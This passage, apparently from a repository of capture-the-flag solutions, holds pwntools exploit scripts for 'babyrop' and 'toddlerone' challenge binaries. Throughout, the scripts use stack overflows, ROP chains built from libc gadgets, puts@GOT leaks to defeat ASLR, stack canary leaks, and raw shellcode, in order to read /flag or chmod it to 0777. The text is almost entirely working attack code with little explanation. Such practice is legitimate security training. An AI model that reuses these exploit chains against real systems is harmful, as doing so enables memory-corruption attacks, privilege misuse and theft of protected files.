p64(0x004010e0) 15 | leaving_addr = p64(0x402004) 16 | set_rdi_registry_gadget = p64(0x0000000000401e46) 17 | set_rsi_registry_gadget = p64(0x0000000000401e36) 18 | set_rdx_registry_gadget = p64(0x0000000000401e3e) 19 | set_rcx_registry_gadget = p64(0x0000000000401e4e) 20 | 21 | # Payload 22 | payload = b"A"*buffer_length + set_rdi_registry_gadget + leaving_addr + set_rsi_registry_gadget + p64(0x0) + set_rdx_registry_gadget + p64(0x0) + open_function_addr +\ 23 | set_rdi_registry_gadget + p64(0x1) + set_rsi_registry_gadget + p64(0x3) + set_rdx_registry_gadget + p64(0x0) + set_rcx_registry_gadget + p64(0x100) + sendfile_function_addr 24 | 25 | 26 | # Action 27 | io.sendline(payload) 28 | io.interactive() 29 | -------------------------------------------------------------------------------- /coderop7.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | # Init 5 | elf = ELF("/challenge/babyrop_level7.0") 6 | context.arch = "amd64" 7 | context.endian = "little" 8 | io = elf.process() 9 | 10 | # Vars 11 | buffer_length = 76 + 4 + 8 # local_58 and variable int 4 byte (local_c) + EBP 12 | 13 | # Retreive the leaked address from the stdout 14 | io.recvuntil("in libc is: ") 15 | libc_system_address = int(io.recvuntil(b".").decode()[:-1], 16) 16 | print(hex(libc_system_address)) 17 | 18 | # Load the elf of libc 19 | libc = ELF(io.libc.path) 20 | print(io.libc.path) 21 | 22 | system_function_in_libc_offset = libc.symbols['system'] 23 | libc_address = libc_system_address - system_function_in_libc_offset 24 | print(hex(libc_address)) 25 | print(hex(system_function_in_libc_offset)) 26 | 27 | # ROPgadgets from libc for chmod 28 | libc_set_rax_gadget = libc_address + 0x36174 29 | libc_set_rdi_gadget = libc_address + 0x23b6a 30 | libc_set_rsi_gadget = libc_address + 0x2601f 31 | libc_syscall_gadget = libc_address + 0x2284d 32 | string_leaving_address = p64(next(elf.search(b"Leaving!\x00"))) 33 | 34 | # Payload 35 | payload = b"A"*buffer_length +\ 36 | p64(libc_set_rax_gadget) + p64(0x5A) + p64(libc_set_rdi_gadget) + string_leaving_address + p64(libc_set_rsi_gadget) + p64(0o777) + p64(libc_syscall_gadget) 37 | 38 | # Action 39 | io.sendline(payload) 40 | io.interactive() 41 | -------------------------------------------------------------------------------- /coderop7m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | # Init 5 | elf = ELF("/challenge/babyrop_level7.1") 6 | context.arch = "amd64" 7 | context.endian = "little" 8 | io = elf.process() 9 | 10 | # Vars 11 | buffer_length = 124 + 4 + 8 # local_88 and variable int 4 byte (local_c) + EBP 12 | 13 | # Retreive the leaked address from the stdout 14 | io.recvuntil("in libc is: ") 15 | libc_system_address = int(io.recvuntil(b".").decode()[:-1], 16) 16 | print(hex(libc_system_address)) 17 | 18 | # Load the elf of libc 19 | libc = ELF(io.libc.path) 20 | print(io.libc.path) 21 | 22 | system_function_in_libc_offset = libc.symbols['system'] 23 | libc_address = libc_system_address - system_function_in_libc_offset 24 | print(hex(libc_address)) 25 | print(hex(system_function_in_libc_offset)) 26 | 27 | # ROPgadgets from libc for chmod 28 | libc_set_rax_gadget = libc_address + 0x36174 29 | libc_set_rdi_gadget = libc_address + 0x23b6a 30 | libc_set_rsi_gadget = libc_address + 0x2601f 31 | libc_syscall_gadget = libc_address + 0x2284d 32 | string_leaving_address = p64(next(elf.search(b"Leaving!\x00"))) 33 | 34 | # Payload 35 | payload = b"A"*buffer_length +\ 36 | p64(libc_set_rax_gadget) + p64(0x5A) + p64(libc_set_rdi_gadget) + string_leaving_address + p64(libc_set_rsi_gadget) + p64(0o777) + p64(libc_syscall_gadget) 37 | 38 | # Action 39 | io.sendline(payload) 40 | io.interactive() -------------------------------------------------------------------------------- /coderop8.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | # Init 5 | elf = ELF("/challenge/babyrop_level8.0") 6 | context.arch = "amd64" 7 | context.endian = "little" 8 | io = elf.process() 9 | 10 | # Vars 11 | buffer_length = 108 + 4 + 8 # local_78 and variable int 4 byte (local_c) + EBP 12 | 13 | # Load the elf of libc 14 | libc = ELF(io.libc.path) 15 | print(io.libc.path) 16 | 17 | # Leak the libc base address with double puts 18 | puts_plt = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] This is also valid to call puts 19 | puts_got = elf.got['puts'] 20 | challenge_plt = elf.symbols['challenge'] 21 | pop_rdi = 0x401dd3 22 | 23 | print("Main start: " + hex(challenge_plt)) 24 | print("Puts plt: " + hex(puts_plt)) 25 | print("pop rdi; ret gadget: " + hex(pop_rdi)) 26 | 27 | payload_libc = b"A"*buffer_length + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(challenge_plt) 28 | 29 | # First interaction 30 | io.recvuntil("binary by returning to its entrypoint.") 31 | io.sendline(payload_libc) 32 | 33 | # Parse leaked address 34 | io.recvuntil("Leaving!\n") 35 | leak = io.recvline()[:-1] + b"\x00"*2 36 | print(len(leak)) 37 | leak = int.from_bytes(leak, "little") 38 | print(hex(leak)) 39 | 40 | # libc base address 41 | libc_address = leak - libc.symbols["puts"] 42 | print(hex(libc_address)) 43 | print(hex(libc.symbols["puts"])) 44 | 45 | # ROPgadgets from libc for chmod 46 | libc_set_rax_gadget = libc_address + 0x36174 47 | libc_set_rdi_gadget = libc_address + 0x23b6a 48 | libc_set_rsi_gadget = libc_address + 0x2601f 49 | libc_syscall_gadget = libc_address + 0x2284d 50 | string_leaving_address = p64(next(elf.search(b"Leaving!\x00"))) 51 | 52 | # Payload 53 | payload = b"A"*buffer_length +\ 54 | p64(libc_set_rax_gadget) + p64(0x5A) + p64(libc_set_rdi_gadget) + string_leaving_address + p64(libc_set_rsi_gadget) + p64(0o777) + p64(libc_syscall_gadget) 55 | 56 | # Second interaction 57 | io.recvuntil("binary by returning to its entrypoint.") 58 | io.sendline(payload) 59 | io.interactive() -------------------------------------------------------------------------------- /coderop8m1.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | import time 3 | 4 | # Init 5 | elf = ELF("/challenge/babyrop_level8.1") 6 | context.arch = "amd64" 7 | context.endian = "little" 8 | io = elf.process() 9 | 10 | # Vars 11 | buffer_length = 60 + 4 + 8 # local_48 and variable int 4 byte (local_c) + EBP 12 | 13 | # Load the elf of libc 14 | libc = ELF(io.libc.path) 15 | print(io.libc.path) 16 | 17 | # Leak the libc base address with double puts 18 | puts_plt = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] This is also valid to call puts 19 | puts_got = elf.got['puts'] 20 | challenge_plt = elf.symbols['challenge'] 21 | pop_rdi = 0x401843 22 | 23 | print("Main start: " + hex(challenge_plt)) 24 | print("Puts plt: " + hex(puts_plt)) 25 | print("pop rdi; ret gadget: " + hex(pop_rdi)) 26 | 27 | payload_libc = b"A"*buffer_length + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(challenge_plt) 28 | 29 | # First interaction 30 | io.sendline(payload_libc) 31 | 32 | # Parse leaked address 33 | io.recvuntil("Leaving!\n") 34 | leak = io.recvline()[:-1] + b"\x00"*2 35 | print(len(leak)) 36 | leak = int.from_bytes(leak, "little") 37 | print(hex(leak)) 38 | 39 | # libc base address 40 | libc_address = leak - libc.symbols["puts"] 41 | print(hex(libc_address)) 42 | print(hex(libc.symbols["puts"])) 43 | 44 | # ROPgadgets from libc for chmod 45 | libc_set_rax_gadget = libc_address + 0x36174 46 | libc_set_rdi_gadget = libc_address + 0x23b6a 47 | libc_set_rsi_gadget = libc_address + 0x2601f 48 | libc_syscall_gadget = libc_address + 0x2284d 49 | string_leaving_address = p64(next(elf.search(b"Leaving!\x00"))) 50 | 51 | # Payload 52 | payload = b"A"*buffer_length +\ 53 | p64(libc_set_rax_gadget) + p64(0x5A) + p64(libc_set_rdi_gadget) + string_leaving_address + p64(libc_set_rsi_gadget) + p64(0o777) + p64(libc_syscall_gadget) 54 | 55 | # Second interaction 56 | io.sendline(payload) 57 | io.interactive() -------------------------------------------------------------------------------- /codeshellcode1.py: -------------------------------------------------------------------------------- 1 | import pwn 2 | import pwnlib.shellcraft as shellcraft 3 | import pwnlib.asm as asm 4 | 5 | proc = pwn.process("/challenge/toddlerone_level1.0") 6 | 7 | 8 | shellcode = b"\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x67\x6d\x60\x66\x01\x01\x01\x48\x31\x04\x24\x6a\x02\x58\x48\x89\xe7\x31\xf6\x0f\x05\x41\xba\xff\xff\xff\x7f\x48\x89\xc6\x6a\x28\x58\x6a\x01\x5f\x99\x0f\x05" 9 | 10 | proc.recvuntil("shellcode from stdin.") 11 | proc.sendline(shellcode) 12 | 13 | proc.recvuntil("size:") 14 | proc.sendline("144") 15 | 16 | ret_addr = pwn.p64(0x2a2ac000, endian='little') 17 | payload = b"a"*136 + ret_addr 18 | proc.recvuntil("bytes)!") 19 | proc.send(payload) 20 | proc.interactive() 21 | 22 | -------------------------------------------------------------------------------- /codeshellcode2.py: -------------------------------------------------------------------------------- 1 | import pwn 2 | import pwnlib.shellcraft as shellcraft 3 | import pwnlib.asm as asm 4 | 5 | proc = pwn.process("/challenge/toddlerone_level2.0") 6 | 7 | 8 | shellcode = b"\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x67\x6d\x60\x66\x01\x01\x01\x48\x31\x04\x24\x6a\x02\x58\x48\x89\xe7\x31\xf6\x0f\x05\x41\xba\xff\xff\xff\x7f\x48\x89\xc6\x6a\x28\x58\x6a\x01\x5f\x99\x0f\x05" 9 | print("The shellcode length: " + str(len(shellcode))) 10 | 11 | proc.recvuntil("size:") 12 | proc.sendline("144") 13 | 14 | 15 | ret_addr = pwn.p64(0x7fffffffd2f0, endian='little') 16 | #payload = b"\x90"*83 + ret_addr 17 | payload = shellcode + b'a'*83 + ret_addr 18 | proc.recvuntil("bytes)!") 19 | proc.send(payload) 20 | proc.interactive() 21 | 22 | -------------------------------------------------------------------------------- /codeshellcode3.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # initialization 4 | context.arch = 'amd64' 5 | context.endian = 'little' 6 | elf = ELF("/challenge/toddlerone_level3.0") 7 | io = elf.process() 8 | 9 | # Vars 10 | distance_canary = 16 #0x10 11 | distance_buffer = 72 #0x48 12 | distance_between_buffer_and_canary = distance_buffer - distance_canary 13 | 14 | # Leak the canary 15 | io.recvuntil("size:") 16 | io.sendline(str(distance_between_buffer_and_canary + 1)) 17 | 18 | io.recvuntil("bytes)!") 19 | 20 | payload_first_run = b'A' * (distance_between_buffer_and_canary - 6) + b'REPEAT' + b'B' 21 | io.sendline(payload_first_run) 22 | 23 | io.recvuntil(b'REPEATB') 24 | canary = b'\x00' + io.recvline().strip()[:7] 25 | print("Canary: " + str(bytes(canary))) 26 | 27 | # Exploit 28 | io.readuntil(b'The input buffer begins at 0x') 29 | buffer_addr = int(io.readuntil(b',').decode()[:-1], 16) 30 | 31 | io.recvuntil("size:") 32 | io.sendline(str(distance_buffer + 8)) 33 | 34 | 35 | shellcode = b"\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x2e\x67\x6d\x60\x66\x01\x01\x01\x48\x31\x04\x24\x6a\x02\x58\x48\x89\xe7\x31\xf6\x0f\x05\x41\xba\xff\xff\xff\x7f\x48\x89\xc6\x6a\x28\x58\x6a\x01\x5f\x99\x0f\x05" 36 | print("Shellcode length: " + str(len(shellcode))) 37 | payload_second_run = b"\x90"*3 + shellcode + canary + b"\x90"*8 + p64(buffer_addr) 38 | 39 | io.recvuntil("bytes)!") 40 | io.sendline(payload_second_run) 41 | io.interactive() -------------------------------------------------------------------------------- /codeshellcode4.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # initialization 4 | context.arch = 'amd64' 5 | context.endian = 'little' 6 | elf = ELF("/challenge/toddlerone_level4.0") 7 | io = elf.process() 8 | 9 | # Vars 10 | distance_canary = 16 #0x10 11 | distance_buffer = 120 #0x78 12 | distance_between_buffer_and_canary = distance_buffer - distance_canary 13 | distance_local_18 = 24 #0x18 14 | 15 | # Leak the canary 16 | io.recvuntil("size:") 17 | io.sendline(f'{distance_between_buffer_and_canary + 1}') 18 | io.recvuntil("bytes)!") 19 | 20 | payload_first_run = b'A' * (distance_between_buffer_and_canary - 6) + b'REPEATZ' 21 | io.sendline(payload_first_run) 22 | 23 | io.recvuntil(b'REPEATZ') 24 | canary = b'\x00' + io.recvline().strip()[:7] 25 | 26 | # Exploit 27 | io.readuntil(b'The input buffer begins at 0x') 28 | buffer_addr = int(io.readuntil(b',').decode()[:-1], 16) 29 | 30 | io.recvuntil("size:") 31 | io.sendline(str(distance_buffer + 8)) 32 | 33 | 34 | shellcode = asm(shellcraft.cat('/flag')) 35 | print("Shellcode length: " + str(len(shellcode))) 36 | local_18 = p64(0xf19699f97eeb4a96) 37 | payload_second_run = shellcode + b'A'*(distance_between_buffer_and_canary - len(shellcode) - 8) + local_18 + canary + p64(0x0) + p64(buffer_addr) 38 | 39 | io.recvuntil("bytes)!") 40 | io.sendline(payload_second_run) 41 | io.interactive() 42 | -------------------------------------------------------------------------------- /codeshellcode5.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # initialization 4 | context.arch = 'amd64' 5 | context.endian = 'little' 6 | elf = ELF("/challenge/toddlerone_level5.0") 7 | io = elf.process() 8 | 9 | # Vars 10 | distance_canary = 32 #0x20 11 | distance_buffer = 136 #0x88 12 | distance_between_buffer_and_canary = distance_buffer - distance_canary 13 | distance_local_38 = 56 #0x38 14 | distance_between_local_38_and_canary = distance_local_38 - distance_canary 15 | distance_between_buffer_and_local_38 = distance_buffer - distance_local_38 16 | 17 | # Leak the canary 18 | io.recvuntil("size:") 19 | io.sendline(f'{distance_between_buffer_and_canary + 1}') 20 | io.recvuntil("bytes)!") 21 | 22 | payload_first_run = b'A' * (distance_between_buffer_and_canary - 6) + b'REPEATZ' 23 | io.sendline(payload_first_run) 24 | 25 | io.recvuntil(b'REPEATZ') 26 | canary = b'\x00' + io.recvline().strip()[:7] 27 | 28 | # Exploit 29 | io.readuntil(b'The input buffer begins at 0x') 30 | buffer_addr = int(io.readuntil(b',').decode()[:-1], 16) 31 | 32 | io.recvuntil("size:") 33 | io.sendline(str(distance_buffer + 8)) 34 | 35 | 36 | shellcode = asm(shellcraft.cat('/flag')) 37 | print("Shellcode length: " + str(len(shellcode))) 38 | local_38 = p64(0xaced06657d665e7e) 39 | payload_second_run = shellcode + b'A'*(distance_between_buffer_and_local_38 - len(shellcode)) + local_38 + b'A'*(distance_between_local_38_and_canary - 8)+ canary + b'A'*24 + p64(buffer_addr) 40 | 41 | io.recvuntil("bytes)!") 42 | io.sendline(payload_second_run) 43 | io.interactive() 44 | 45 | --------------------------------------------------------------------------------